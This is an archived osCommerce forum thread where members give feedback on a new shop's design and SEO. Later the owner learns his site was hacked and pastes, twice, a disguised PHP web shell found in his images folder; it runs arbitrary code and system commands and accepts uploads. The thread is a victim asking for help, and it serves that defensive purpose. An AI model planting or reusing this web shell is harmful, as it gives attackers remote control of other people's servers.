• Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

New store needs feeback

kdreams

clear and professional look, at the header can be something better image.

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

sorry thought to add the font at product info is different size and type, you need to adjust it.

Length : n/a  Brand :Lovers Choice

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

• 3 months later...

Hi David,

I would change the footer bar color. Everything else is red/black.........the blue footer bar looks out of place. Other than that, very clean looking, organized site.

Chris

Thanks chris i have changed the footer and now im changing the txt but if someone could direct me to the style sheet to change the product txt as i cant find tht one

brnady the whole site cost me over 700 pound and i have had my partner design new graphics for it

thanks for the feedback so far

The site looks ok. Not totally sold on the header image.

Definitely should have some seo optimization done, since most basics are missing.

Nice design, What do i need to have a site like yours...

brnady..

Its fairly easy to make such a site.

This site is based of a purchased template, with some small changes and some contributions added.

• 1 month later...

This is a very organized website, very sexy too! :)

I am building an oscommerce store also, i hope i can find good templates for my site to work on

its very fun but everytime i look at my site i see something else i want to change its taking over my life lol

thanks to all the feedback so far

if anyone wants any images created let me know

• 3 months later...
  • 2 weeks later...

How is the Magic SEO? Is it really worth the $90 USA??

its not too bad does what it says although it has crashed my site

if anyone could help me i had to do a full restore and when i got everything back up i know have parts of boxes where there shouldnt be it is calling for pixel_trans.gif but i cant find it in the image folder

thanks in advance

• 5 months later...

Hi David.

Your site has been hacked.

There are php files in your images folder. Look for any files that are not part of the standard osCommerce download and remove them. Then, check each osCommerce file for scripts and code that should not be there.

This link should help

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

Regards

Ken.

Hi David.

Your site has been hacked.

There are php files in your images folder. Look for any files that are not part of the standard osCommerce download and remove them. Then, check each osCommerce file for scripts and code that should not be there.

This link should help

http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

Regards

Ken.

Hi I have had a look and the php fils are named google and when i open the they show this Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

is this right or should i delete them

Hi I have had a look and the php fils are named google and when i open the they show this Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

is this right or should i delete them

that looks like hack code to me

Archived